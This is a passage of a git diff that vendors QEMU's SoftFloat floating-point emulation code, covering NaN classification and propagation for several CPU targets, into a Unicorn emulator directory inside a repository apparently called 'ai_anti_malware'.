+*----------------------------------------------------------------------------*/ + +int float32_is_quiet_nan( float32 a_ ) +{ + uint32_t a = float32_val(a_); +#if SNAN_BIT_IS_ONE + return ( ( ( a>>22 ) & 0x1FF ) == 0x1FE ) && ( a & 0x003FFFFF ); +#else + return ( 0xFF800000 <= (uint32_t) ( a<<1 ) ); +#endif +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is a signaling +| NaN; otherwise returns 0. 
+*----------------------------------------------------------------------------*/ + +int float32_is_signaling_nan( float32 a_ ) +{ + uint32_t a = float32_val(a_); +#if SNAN_BIT_IS_ONE + return ( 0xFF800000 <= (uint32_t) ( a<<1 ) ); +#else + return ( ( ( a>>22 ) & 0x1FF ) == 0x1FE ) && ( a & 0x003FFFFF ); +#endif +} +#endif + +/*---------------------------------------------------------------------------- +| Returns a quiet NaN if the single-precision floating point value `a' is a +| signaling NaN; otherwise returns `a'. +*----------------------------------------------------------------------------*/ + +float32 float32_maybe_silence_nan( float32 a_ ) +{ + if (float32_is_signaling_nan(a_)) { +#if SNAN_BIT_IS_ONE +# if defined(TARGET_MIPS) || defined(TARGET_SH4) || defined(TARGET_UNICORE32) + return float32_default_nan; +# else +# error Rules for silencing a signaling NaN are target-specific +# endif +#else + uint32_t a = float32_val(a_); + a |= (1 << 22); + return make_float32(a); +#endif + } + return a_; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point NaN +| `a' to the canonical NaN format. If `a' is a signaling NaN, the invalid +| exception is raised. +*----------------------------------------------------------------------------*/ + +static commonNaNT float32ToCommonNaN( float32 a STATUS_PARAM ) +{ + commonNaNT z; + + if ( float32_is_signaling_nan( a ) ) float_raise( float_flag_invalid STATUS_VAR ); + z.sign = float32_val(a)>>31; + z.low = 0; + z.high = ( (uint64_t) float32_val(a) )<<41; + return z; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the canonical NaN `a' to the single- +| precision floating-point format. 
+*----------------------------------------------------------------------------*/ + +static float32 commonNaNToFloat32( commonNaNT a STATUS_PARAM) +{ + uint32_t mantissa = a.high>>41; + + if ( STATUS(default_nan_mode) ) { + return float32_default_nan; + } + + if ( mantissa ) + return make_float32( + ( ( (uint32_t) a.sign )<<31 ) | 0x7F800000 | ( a.high>>41 ) ); + else + return float32_default_nan; +} + +/*---------------------------------------------------------------------------- +| Select which NaN to propagate for a two-input operation. +| IEEE754 doesn't specify all the details of this, so the +| algorithm is target-specific. +| The routine is passed various bits of information about the +| two NaNs and should return 0 to select NaN a and 1 for NaN b. +| Note that signalling NaNs are always squashed to quiet NaNs +| by the caller, by calling floatXX_maybe_silence_nan() before +| returning them. +| +| aIsLargerSignificand is only valid if both a and b are NaNs +| of some kind, and is true if a has the larger significand, +| or if both a and b have the same significand but a is +| positive but b is negative. It is only needed for the x87 +| tie-break rule. +*----------------------------------------------------------------------------*/ + +#if defined(TARGET_ARM) +static int pickNaN(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag aIsLargerSignificand) +{ + /* ARM mandated NaN propagation rules: take the first of: + * 1. A if it is signaling + * 2. B if it is signaling + * 3. A (quiet) + * 4. B (quiet) + * A signaling NaN is always quietened before returning it. + */ + if (aIsSNaN) { + return 0; + } else if (bIsSNaN) { + return 1; + } else if (aIsQNaN) { + return 0; + } else { + return 1; + } +} +#elif defined(TARGET_MIPS) +static int pickNaN(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag aIsLargerSignificand) +{ + /* According to MIPS specifications, if one of the two operands is + * a sNaN, a new qNaN has to be generated. 
This is done in + * floatXX_maybe_silence_nan(). For qNaN inputs the specifications + * says: "When possible, this QNaN result is one of the operand QNaN + * values." In practice it seems that most implementations choose + * the first operand if both operands are qNaN. In short this gives + * the following rules: + * 1. A if it is signaling + * 2. B if it is signaling + * 3. A (quiet) + * 4. B (quiet) + * A signaling NaN is always silenced before returning it. + */ + if (aIsSNaN) { + return 0; + } else if (bIsSNaN) { + return 1; + } else if (aIsQNaN) { + return 0; + } else { + return 1; + } +} +#elif defined(TARGET_PPC) || defined(TARGET_XTENSA) +static int pickNaN(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag aIsLargerSignificand) +{ + /* PowerPC propagation rules: + * 1. A if it sNaN or qNaN + * 2. B if it sNaN or qNaN + * A signaling NaN is always silenced before returning it. + */ + if (aIsSNaN || aIsQNaN) { + return 0; + } else { + return 1; + } +} +#else +static int pickNaN(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag aIsLargerSignificand) +{ + /* This implements x87 NaN propagation rules: + * SNaN + QNaN => return the QNaN + * two SNaNs => return the one with the larger significand, silenced + * two QNaNs => return the one with the larger significand + * SNaN and a non-NaN => return the SNaN, silenced + * QNaN and a non-NaN => return the QNaN + * + * If we get down to comparing significands and they are the same, + * return the NaN with the positive sign bit (if any). + */ + if (aIsSNaN) { + if (bIsSNaN) { + return aIsLargerSignificand ? 0 : 1; + } + return bIsQNaN ? 1 : 0; + } + else if (aIsQNaN) { + if (bIsSNaN || !bIsQNaN) + return 0; + else { + return aIsLargerSignificand ? 0 : 1; + } + } else { + return 1; + } +} +#endif + +/*---------------------------------------------------------------------------- +| Select which NaN to propagate for a three-input operation. 
+| For the moment we assume that no CPU needs the 'larger significand' +| information. +| Return values : 0 : a; 1 : b; 2 : c; 3 : default-NaN +*----------------------------------------------------------------------------*/ +#if defined(TARGET_ARM) +static int pickNaNMulAdd(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag cIsQNaN, flag cIsSNaN, flag infzero STATUS_PARAM) +{ + /* For ARM, the (inf,zero,qnan) case sets InvalidOp and returns + * the default NaN + */ + if (infzero && cIsQNaN) { + float_raise(float_flag_invalid STATUS_VAR); + return 3; + } + + /* This looks different from the ARM ARM pseudocode, because the ARM ARM + * puts the operands to a fused mac operation (a*b)+c in the order c,a,b. + */ + if (cIsSNaN) { + return 2; + } else if (aIsSNaN) { + return 0; + } else if (bIsSNaN) { + return 1; + } else if (cIsQNaN) { + return 2; + } else if (aIsQNaN) { + return 0; + } else { + return 1; + } +} +#elif defined(TARGET_MIPS) +static int pickNaNMulAdd(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag cIsQNaN, flag cIsSNaN, flag infzero STATUS_PARAM) +{ + /* For MIPS, the (inf,zero,qnan) case sets InvalidOp and returns + * the default NaN + */ + if (infzero) { + float_raise(float_flag_invalid STATUS_VAR); + return 3; + } + + /* Prefer sNaN over qNaN, in the a, b, c order. 
*/ + if (aIsSNaN) { + return 0; + } else if (bIsSNaN) { + return 1; + } else if (cIsSNaN) { + return 2; + } else if (aIsQNaN) { + return 0; + } else if (bIsQNaN) { + return 1; + } else { + return 2; + } +} +#elif defined(TARGET_PPC) +static int pickNaNMulAdd(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag cIsQNaN, flag cIsSNaN, flag infzero STATUS_PARAM) +{ + /* For PPC, the (inf,zero,qnan) case sets InvalidOp, but we prefer + * to return an input NaN if we have one (ie c) rather than generating + * a default NaN + */ + if (infzero) { + float_raise(float_flag_invalid STATUS_VAR); + return 2; + } + + /* If fRA is a NaN return it; otherwise if fRB is a NaN return it; + * otherwise return fRC. Note that muladd on PPC is (fRA * fRC) + frB + */ + if (aIsSNaN || aIsQNaN) { + return 0; + } else if (cIsSNaN || cIsQNaN) { + return 2; + } else { + return 1; + } +} +#else +/* A default implementation: prefer a to b to c. + * This is unlikely to actually match any real implementation. + */ +static int pickNaNMulAdd(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag cIsQNaN, flag cIsSNaN, flag infzero STATUS_PARAM) +{ + if (aIsSNaN || aIsQNaN) { + return 0; + } else if (bIsSNaN || bIsQNaN) { + return 1; + } else { + return 2; + } +} +#endif + +/*---------------------------------------------------------------------------- +| Takes two single-precision floating-point values `a' and `b', one of which +| is a NaN, and returns the appropriate NaN result. If either `a' or `b' is a +| signaling NaN, the invalid exception is raised. 
+*----------------------------------------------------------------------------*/ + +static float32 propagateFloat32NaN( float32 a, float32 b STATUS_PARAM) +{ + flag aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN; + flag aIsLargerSignificand; + uint32_t av, bv; + + aIsQuietNaN = float32_is_quiet_nan( a ); + aIsSignalingNaN = float32_is_signaling_nan( a ); + bIsQuietNaN = float32_is_quiet_nan( b ); + bIsSignalingNaN = float32_is_signaling_nan( b ); + av = float32_val(a); + bv = float32_val(b); + + if ( aIsSignalingNaN | bIsSignalingNaN ) float_raise( float_flag_invalid STATUS_VAR); + + if ( STATUS(default_nan_mode) ) + return float32_default_nan; + + if ((uint32_t)(av<<1) < (uint32_t)(bv<<1)) { + aIsLargerSignificand = 0; + } else if ((uint32_t)(bv<<1) < (uint32_t)(av<<1)) { + aIsLargerSignificand = 1; + } else { + aIsLargerSignificand = (av < bv) ? 1 : 0; + } + + if (pickNaN(aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN, + aIsLargerSignificand)) { + return float32_maybe_silence_nan(b); + } else { + return float32_maybe_silence_nan(a); + } +} + +/*---------------------------------------------------------------------------- +| Takes three single-precision floating-point values `a', `b' and `c', one of +| which is a NaN, and returns the appropriate NaN result. If any of `a', +| `b' or `c' is a signaling NaN, the invalid exception is raised. +| The input infzero indicates whether a*b was 0*inf or inf*0 (in which case +| obviously c is a NaN, and whether to propagate c or some other NaN is +| implementation defined). 
+*----------------------------------------------------------------------------*/ + +static float32 propagateFloat32MulAddNaN(float32 a, float32 b, + float32 c, flag infzero STATUS_PARAM) +{ + flag aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN, + cIsQuietNaN, cIsSignalingNaN; + int which; + + aIsQuietNaN = float32_is_quiet_nan(a); + aIsSignalingNaN = float32_is_signaling_nan(a); + bIsQuietNaN = float32_is_quiet_nan(b); + bIsSignalingNaN = float32_is_signaling_nan(b); + cIsQuietNaN = float32_is_quiet_nan(c); + cIsSignalingNaN = float32_is_signaling_nan(c); + + if (aIsSignalingNaN | bIsSignalingNaN | cIsSignalingNaN) { + float_raise(float_flag_invalid STATUS_VAR); + } + + which = pickNaNMulAdd(aIsQuietNaN, aIsSignalingNaN, + bIsQuietNaN, bIsSignalingNaN, + cIsQuietNaN, cIsSignalingNaN, infzero STATUS_VAR); + + if (STATUS(default_nan_mode)) { + /* Note that this check is after pickNaNMulAdd so that function + * has an opportunity to set the Invalid flag. + */ + return float32_default_nan; + } + + switch (which) { + case 0: + return float32_maybe_silence_nan(a); + case 1: + return float32_maybe_silence_nan(b); + case 2: + return float32_maybe_silence_nan(c); + case 3: + default: + return float32_default_nan; + } +} + +#ifdef NO_SIGNALING_NANS +int float64_is_quiet_nan(float64 a_) +{ + return float64_is_any_nan(a_); +} + +int float64_is_signaling_nan(float64 a_) +{ + return 0; +} +#else +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is a quiet +| NaN; otherwise returns 0. 
+*----------------------------------------------------------------------------*/ + +int float64_is_quiet_nan( float64 a_ ) +{ + uint64_t a = float64_val(a_); +#if SNAN_BIT_IS_ONE + return + ( ( ( a>>51 ) & 0xFFF ) == 0xFFE ) + && ( a & LIT64( 0x0007FFFFFFFFFFFF ) ); +#else + return ( LIT64( 0xFFF0000000000000 ) <= (uint64_t) ( a<<1 ) ); +#endif +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is a signaling +| NaN; otherwise returns 0. +*----------------------------------------------------------------------------*/ + +int float64_is_signaling_nan( float64 a_ ) +{ + uint64_t a = float64_val(a_); +#if SNAN_BIT_IS_ONE + return ( LIT64( 0xFFF0000000000000 ) <= (uint64_t) ( a<<1 ) ); +#else + return + ( ( ( a>>51 ) & 0xFFF ) == 0xFFE ) + && ( a & LIT64( 0x0007FFFFFFFFFFFF ) ); +#endif +} +#endif + +/*---------------------------------------------------------------------------- +| Returns a quiet NaN if the double-precision floating point value `a' is a +| signaling NaN; otherwise returns `a'. +*----------------------------------------------------------------------------*/ + +float64 float64_maybe_silence_nan( float64 a_ ) +{ + if (float64_is_signaling_nan(a_)) { +#if SNAN_BIT_IS_ONE +# if defined(TARGET_MIPS) || defined(TARGET_SH4) || defined(TARGET_UNICORE32) + return float64_default_nan; +# else +# error Rules for silencing a signaling NaN are target-specific +# endif +#else + uint64_t a = float64_val(a_); + a |= LIT64( 0x0008000000000000 ); + return make_float64(a); +#endif + } + return a_; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point NaN +| `a' to the canonical NaN format. If `a' is a signaling NaN, the invalid +| exception is raised. 
+*----------------------------------------------------------------------------*/ + +static commonNaNT float64ToCommonNaN( float64 a STATUS_PARAM) +{ + commonNaNT z; + + if ( float64_is_signaling_nan( a ) ) float_raise( float_flag_invalid STATUS_VAR); + z.sign = float64_val(a)>>63; + z.low = 0; + z.high = float64_val(a)<<12; + return z; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the canonical NaN `a' to the double- +| precision floating-point format. +*----------------------------------------------------------------------------*/ + +static float64 commonNaNToFloat64( commonNaNT a STATUS_PARAM) +{ + uint64_t mantissa = a.high>>12; + + if ( STATUS(default_nan_mode) ) { + return float64_default_nan; + } + + if ( mantissa ) + return make_float64( + ( ( (uint64_t) a.sign )<<63 ) + | LIT64( 0x7FF0000000000000 ) + | ( a.high>>12 )); + else + return float64_default_nan; +} + +/*---------------------------------------------------------------------------- +| Takes two double-precision floating-point values `a' and `b', one of which +| is a NaN, and returns the appropriate NaN result. If either `a' or `b' is a +| signaling NaN, the invalid exception is raised. 
+*----------------------------------------------------------------------------*/ + +static float64 propagateFloat64NaN( float64 a, float64 b STATUS_PARAM) +{ + flag aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN; + flag aIsLargerSignificand; + uint64_t av, bv; + + aIsQuietNaN = float64_is_quiet_nan( a ); + aIsSignalingNaN = float64_is_signaling_nan( a ); + bIsQuietNaN = float64_is_quiet_nan( b ); + bIsSignalingNaN = float64_is_signaling_nan( b ); + av = float64_val(a); + bv = float64_val(b); + + if ( aIsSignalingNaN | bIsSignalingNaN ) float_raise( float_flag_invalid STATUS_VAR); + + if ( STATUS(default_nan_mode) ) + return float64_default_nan; + + if ((uint64_t)(av<<1) < (uint64_t)(bv<<1)) { + aIsLargerSignificand = 0; + } else if ((uint64_t)(bv<<1) < (uint64_t)(av<<1)) { + aIsLargerSignificand = 1; + } else { + aIsLargerSignificand = (av < bv) ? 1 : 0; + } + + if (pickNaN(aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN, + aIsLargerSignificand)) { + return float64_maybe_silence_nan(b); + } else { + return float64_maybe_silence_nan(a); + } +} + +/*---------------------------------------------------------------------------- +| Takes three double-precision floating-point values `a', `b' and `c', one of +| which is a NaN, and returns the appropriate NaN result. If any of `a', +| `b' or `c' is a signaling NaN, the invalid exception is raised. +| The input infzero indicates whether a*b was 0*inf or inf*0 (in which case +| obviously c is a NaN, and whether to propagate c or some other NaN is +| implementation defined). 
+*----------------------------------------------------------------------------*/ + +static float64 propagateFloat64MulAddNaN(float64 a, float64 b, + float64 c, flag infzero STATUS_PARAM) +{ + flag aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN, + cIsQuietNaN, cIsSignalingNaN; + int which; + + aIsQuietNaN = float64_is_quiet_nan(a); + aIsSignalingNaN = float64_is_signaling_nan(a); + bIsQuietNaN = float64_is_quiet_nan(b); + bIsSignalingNaN = float64_is_signaling_nan(b); + cIsQuietNaN = float64_is_quiet_nan(c); + cIsSignalingNaN = float64_is_signaling_nan(c); + + if (aIsSignalingNaN | bIsSignalingNaN | cIsSignalingNaN) { + float_raise(float_flag_invalid STATUS_VAR); + } + + which = pickNaNMulAdd(aIsQuietNaN, aIsSignalingNaN, + bIsQuietNaN, bIsSignalingNaN, + cIsQuietNaN, cIsSignalingNaN, infzero STATUS_VAR); + + if (STATUS(default_nan_mode)) { + /* Note that this check is after pickNaNMulAdd so that function + * has an opportunity to set the Invalid flag. + */ + return float64_default_nan; + } + + switch (which) { + case 0: + return float64_maybe_silence_nan(a); + case 1: + return float64_maybe_silence_nan(b); + case 2: + return float64_maybe_silence_nan(c); + case 3: + default: + return float64_default_nan; + } +} + +#ifdef NO_SIGNALING_NANS +int floatx80_is_quiet_nan(floatx80 a_) +{ + return floatx80_is_any_nan(a_); +} + +int floatx80_is_signaling_nan(floatx80 a_) +{ + return 0; +} +#else +/*---------------------------------------------------------------------------- +| Returns 1 if the extended double-precision floating-point value `a' is a +| quiet NaN; otherwise returns 0. This slightly differs from the same +| function for other types as floatx80 has an explicit bit. 
+*----------------------------------------------------------------------------*/ + +int floatx80_is_quiet_nan( floatx80 a ) +{ +#if SNAN_BIT_IS_ONE + uint64_t aLow; + + aLow = a.low & ~ LIT64( 0x4000000000000000 ); + return + ( ( a.high & 0x7FFF ) == 0x7FFF ) + && (uint64_t) ( aLow<<1 ) + && ( a.low == aLow ); +#else + return ( ( a.high & 0x7FFF ) == 0x7FFF ) + && (LIT64( 0x8000000000000000 ) <= ((uint64_t) ( a.low<<1 ))); +#endif +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the extended double-precision floating-point value `a' is a +| signaling NaN; otherwise returns 0. This slightly differs from the same +| function for other types as floatx80 has an explicit bit. +*----------------------------------------------------------------------------*/ + +int floatx80_is_signaling_nan( floatx80 a ) +{ +#if SNAN_BIT_IS_ONE + return ( ( a.high & 0x7FFF ) == 0x7FFF ) + && (LIT64( 0x8000000000000000 ) <= ((uint64_t) ( a.low<<1 ))); +#else + uint64_t aLow; + + aLow = a.low & ~ LIT64( 0x4000000000000000 ); + return + ( ( a.high & 0x7FFF ) == 0x7FFF ) + && (uint64_t) ( aLow<<1 ) + && ( a.low == aLow ); +#endif +} +#endif + +/*---------------------------------------------------------------------------- +| Returns a quiet NaN if the extended double-precision floating point value +| `a' is a signaling NaN; otherwise returns `a'. 
+*----------------------------------------------------------------------------*/ + +floatx80 floatx80_maybe_silence_nan( floatx80 a ) +{ + if (floatx80_is_signaling_nan(a)) { +#if SNAN_BIT_IS_ONE +# if defined(TARGET_MIPS) || defined(TARGET_SH4) || defined(TARGET_UNICORE32) + a.low = floatx80_default_nan_low; + a.high = floatx80_default_nan_high; +# else +# error Rules for silencing a signaling NaN are target-specific +# endif +#else + a.low |= LIT64( 0xC000000000000000 ); + return a; +#endif + } + return a; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point NaN `a' to the canonical NaN format. If `a' is a signaling NaN, the +| invalid exception is raised. +*----------------------------------------------------------------------------*/ + +static commonNaNT floatx80ToCommonNaN( floatx80 a STATUS_PARAM) +{ + commonNaNT z; + + if ( floatx80_is_signaling_nan( a ) ) float_raise( float_flag_invalid STATUS_VAR); + if ( a.low >> 63 ) { + z.sign = a.high >> 15; + z.low = 0; + z.high = a.low << 1; + } else { + z.sign = floatx80_default_nan_high >> 15; + z.low = 0; + z.high = floatx80_default_nan_low << 1; + } + return z; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the canonical NaN `a' to the extended +| double-precision floating-point format. 
+*----------------------------------------------------------------------------*/ + +static floatx80 commonNaNToFloatx80( commonNaNT a STATUS_PARAM) +{ + floatx80 z; + + if ( STATUS(default_nan_mode) ) { + z.low = floatx80_default_nan_low; + z.high = floatx80_default_nan_high; + return z; + } + + if (a.high >> 1) { + z.low = LIT64( 0x8000000000000000 ) | a.high >> 1; + z.high = ( ( (uint16_t) a.sign )<<15 ) | 0x7FFF; + } else { + z.low = floatx80_default_nan_low; + z.high = floatx80_default_nan_high; + } + + return z; +} + +/*---------------------------------------------------------------------------- +| Takes two extended double-precision floating-point values `a' and `b', one +| of which is a NaN, and returns the appropriate NaN result. If either `a' or +| `b' is a signaling NaN, the invalid exception is raised. +*----------------------------------------------------------------------------*/ + +static floatx80 propagateFloatx80NaN( floatx80 a, floatx80 b STATUS_PARAM) +{ + flag aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN; + flag aIsLargerSignificand; + + aIsQuietNaN = floatx80_is_quiet_nan( a ); + aIsSignalingNaN = floatx80_is_signaling_nan( a ); + bIsQuietNaN = floatx80_is_quiet_nan( b ); + bIsSignalingNaN = floatx80_is_signaling_nan( b ); + + if ( aIsSignalingNaN | bIsSignalingNaN ) float_raise( float_flag_invalid STATUS_VAR); + + if ( STATUS(default_nan_mode) ) { + a.low = floatx80_default_nan_low; + a.high = floatx80_default_nan_high; + return a; + } + + if (a.low < b.low) { + aIsLargerSignificand = 0; + } else if (b.low < a.low) { + aIsLargerSignificand = 1; + } else { + aIsLargerSignificand = (a.high < b.high) ? 
1 : 0; + } + + if (pickNaN(aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN, + aIsLargerSignificand)) { + return floatx80_maybe_silence_nan(b); + } else { + return floatx80_maybe_silence_nan(a); + } +} + +#ifdef NO_SIGNALING_NANS +int float128_is_quiet_nan(float128 a_) +{ + return float128_is_any_nan(a_); +} + +int float128_is_signaling_nan(float128 a_) +{ + return 0; +} +#else +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is a quiet +| NaN; otherwise returns 0. +*----------------------------------------------------------------------------*/ + +int float128_is_quiet_nan( float128 a ) +{ +#if SNAN_BIT_IS_ONE + return + ( ( ( a.high>>47 ) & 0xFFFF ) == 0xFFFE ) + && ( a.low || ( a.high & LIT64( 0x00007FFFFFFFFFFF ) ) ); +#else + return + ( LIT64( 0xFFFE000000000000 ) <= (uint64_t) ( a.high<<1 ) ) + && ( a.low || ( a.high & LIT64( 0x0000FFFFFFFFFFFF ) ) ); +#endif +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is a +| signaling NaN; otherwise returns 0. +*----------------------------------------------------------------------------*/ + +int float128_is_signaling_nan( float128 a ) +{ +#if SNAN_BIT_IS_ONE + return + ( LIT64( 0xFFFE000000000000 ) <= (uint64_t) ( a.high<<1 ) ) + && ( a.low || ( a.high & LIT64( 0x0000FFFFFFFFFFFF ) ) ); +#else + return + ( ( ( a.high>>47 ) & 0xFFFF ) == 0xFFFE ) + && ( a.low || ( a.high & LIT64( 0x00007FFFFFFFFFFF ) ) ); +#endif +} +#endif + +/*---------------------------------------------------------------------------- +| Returns a quiet NaN if the quadruple-precision floating point value `a' is +| a signaling NaN; otherwise returns `a'. 
+*----------------------------------------------------------------------------*/ + +float128 float128_maybe_silence_nan( float128 a ) +{ + if (float128_is_signaling_nan(a)) { +#if SNAN_BIT_IS_ONE +# if defined(TARGET_MIPS) || defined(TARGET_SH4) || defined(TARGET_UNICORE32) + a.low = float128_default_nan_low; + a.high = float128_default_nan_high; +# else +# error Rules for silencing a signaling NaN are target-specific +# endif +#else + a.high |= LIT64( 0x0000800000000000 ); + return a; +#endif + } + return a; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the quadruple-precision floating-point NaN +| `a' to the canonical NaN format. If `a' is a signaling NaN, the invalid +| exception is raised. +*----------------------------------------------------------------------------*/ + +static commonNaNT float128ToCommonNaN( float128 a STATUS_PARAM) +{ + commonNaNT z; + + if ( float128_is_signaling_nan( a ) ) float_raise( float_flag_invalid STATUS_VAR); + z.sign = a.high>>63; + shortShift128Left( a.high, a.low, 16, &z.high, &z.low ); + return z; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the canonical NaN `a' to the quadruple- +| precision floating-point format. +*----------------------------------------------------------------------------*/ + +static float128 commonNaNToFloat128( commonNaNT a STATUS_PARAM) +{ + float128 z; + + if ( STATUS(default_nan_mode) ) { + z.low = float128_default_nan_low; + z.high = float128_default_nan_high; + return z; + } + + shift128Right( a.high, a.low, 16, &z.high, &z.low ); + z.high |= ( ( (uint64_t) a.sign )<<63 ) | LIT64( 0x7FFF000000000000 ); + return z; +} + +/*---------------------------------------------------------------------------- +| Takes two quadruple-precision floating-point values `a' and `b', one of +| which is a NaN, and returns the appropriate NaN result. 
If either `a' or +| `b' is a signaling NaN, the invalid exception is raised. +*----------------------------------------------------------------------------*/ + +static float128 propagateFloat128NaN( float128 a, float128 b STATUS_PARAM) +{ + flag aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN; + flag aIsLargerSignificand; + + aIsQuietNaN = float128_is_quiet_nan( a ); + aIsSignalingNaN = float128_is_signaling_nan( a ); + bIsQuietNaN = float128_is_quiet_nan( b ); + bIsSignalingNaN = float128_is_signaling_nan( b ); + + if ( aIsSignalingNaN | bIsSignalingNaN ) float_raise( float_flag_invalid STATUS_VAR); + + if ( STATUS(default_nan_mode) ) { + a.low = float128_default_nan_low; + a.high = float128_default_nan_high; + return a; + } + + if (lt128(a.high<<1, a.low, b.high<<1, b.low)) { + aIsLargerSignificand = 0; + } else if (lt128(b.high<<1, b.low, a.high<<1, a.low)) { + aIsLargerSignificand = 1; + } else { + aIsLargerSignificand = (a.high < b.high) ? 1 : 0; + } + + if (pickNaN(aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN, + aIsLargerSignificand)) { + return float128_maybe_silence_nan(b); + } else { + return float128_maybe_silence_nan(a); + } +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat.c b/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat.c new file mode 100644 index 0000000..d1031ba --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat.c @@ -0,0 +1,7579 @@ +/* + * QEMU float support + * + * Derived from SoftFloat. + */ + +/*============================================================================ + +This C source file is part of the SoftFloat IEC/IEEE Floating-point Arithmetic +Package, Release 2b. + +Written by John R. Hauser. This work was made possible in part by the +International Computer Science Institute, located at Suite 600, 1947 Center +Street, Berkeley, California 94704. Funding was partially provided by the +National Science Foundation under grant MIP-9311980. 
The original version +of this code was written as part of a project to build a fixed-point vector +processor in collaboration with the University of California at Berkeley, +overseen by Profs. Nelson Morgan and John Wawrzynek. More information +is available through the Web page `http://www.cs.berkeley.edu/~jhauser/ +arithmetic/SoftFloat.html'. + +THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has +been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES +RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS +AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ALL LOSSES, +COSTS, OR OTHER PROBLEMS THEY INCUR DUE TO THE SOFTWARE, AND WHO FURTHERMORE +EFFECTIVELY INDEMNIFY JOHN HAUSER AND THE INTERNATIONAL COMPUTER SCIENCE +INSTITUTE (possibly via similar legal warning) AGAINST ALL LOSSES, COSTS, OR +OTHER PROBLEMS INCURRED BY THEIR CUSTOMERS AND CLIENTS DUE TO THE SOFTWARE. + +Derivative works are acceptable, even for commercial purposes, so long as +(1) the source code for the derivative work includes prominent notice that +the work is derivative, and (2) the source code includes prominent notice with +these four paragraphs for those parts of this code that are retained. + +=============================================================================*/ + +/* softfloat (and in particular the code in softfloat-specialize.h) is + * target-dependent and needs the TARGET_* macros. + */ +#include "config.h" + +#include "fpu/softfloat.h" + +/* We only need stdlib for abort() */ +#include <stdlib.h> + +/*---------------------------------------------------------------------------- +| Primitive arithmetic functions, including multi-word arithmetic, and +| division and square root approximations. (Can be specialized to target if +| desired.) 
+*----------------------------------------------------------------------------*/ +#include "softfloat-macros.h" + +/*---------------------------------------------------------------------------- +| Functions and definitions to determine: (1) whether tininess for underflow +| is detected before or after rounding by default, (2) what (if anything) +| happens when exceptions are raised, (3) how signaling NaNs are distinguished +| from quiet NaNs, (4) the default generated quiet NaNs, and (5) how NaNs +| are propagated from function inputs to output. These details are target- +| specific. +*----------------------------------------------------------------------------*/ +#include "softfloat-specialize.h" + +/*---------------------------------------------------------------------------- +| Returns the fraction bits of the half-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline uint32_t extractFloat16Frac(float16 a) +{ + return float16_val(a) & 0x3ff; +} + +/*---------------------------------------------------------------------------- +| Returns the exponent bits of the half-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline int_fast16_t extractFloat16Exp(float16 a) +{ + return (float16_val(a) >> 10) & 0x1f; +} + +/*---------------------------------------------------------------------------- +| Returns the sign bit of the single-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline flag extractFloat16Sign(float16 a) +{ + return float16_val(a)>>15; +} + +/*---------------------------------------------------------------------------- +| Takes a 64-bit fixed-point value `absZ' with binary point between bits 6 +| and 7, and returns the properly rounded 32-bit integer corresponding to the +| input. 
